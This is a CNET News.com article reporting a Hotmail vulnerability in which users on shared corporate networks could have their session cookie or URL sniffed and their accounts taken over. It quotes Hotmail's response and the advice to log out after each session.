Another security hole in Hotmail

The free emailer acknowledges a security problem that could compromise user accounts in corporate computing environments.

Paul Festa Staff Writer, CNET News.com
Paul Festa
covers browser development and Web standards.
Paul Festa
2 min read
Microsoft's Hotmail has acknowledged a security problem with its Web-based email service that could compromise the accounts of users in corporate computing environments.

The current problem comes on the heels of a series of bugs that plagued Hotmail and other Web-based free email providers last month.

Hotmail downplayed its own responsibility for the current problem, however, characterizing it as "largely a network security issue."

"It appears that if you're in an insecure network, behind a firewall with another user, that second user can 'sniff' the traffic, including the Hotmail URL or the cookie, as long as the first user is still logged onto the service," said Sean Fee, director of product marketing at Hotmail.

Fee was referring to the practice of "packet sniffing," or monitoring data as it passes through a network.

Fee said the intruder could access another account behind the same firewall in one of two ways.

One is to swipe the cookie, or the file that Hotmail places on the user's computer to identify that computer. Hotmail and other free email providers rely on cookies because computers in corporate or other network environments usually are assigned random IP (Internet protocol) addresses, rather than given one address per computer.

The other way is to steal the Web address, or URL, sent to and from Hotmail. By cutting and pasting that URL into a browser window before the victim's session expires, the intruder can access the account.

Hotmail's present security problem bears some resemblance to a hole BellSouth fixed last month. In that situation, the BellSouth Web mail URLs were showing up on the server logs of third-party Web sites that Web mail users visited directly from their accounts.

In this case, however, Fee stressed that only users in "insecure networks" were at risk.

The security hole also resembles problems in revealing users' Web mail addresses and other personal information that both Excite and Hotmail have faced. But in this case, intruders can not only glean addresses and information, but also gain complete control over the user's account, letting them read, delete, and send mail under the victim's name.

The problem is the subject of a Web page by Chee Mun Kean, a computer science student in Kuala Lumpur.

Both Fee and Chee recommended that users log out after completing their Hotmail sessions, because intruders can only take advantage of this problem if the account holder's session is still active. Hotmail sessions last two hours unless the user logs out or shuts down the browser.

Fee said Hotmail engineers were examining Chee's description of the problem.

"We will see if there are any appropriate steps that we can take to help minimize user risk," he added.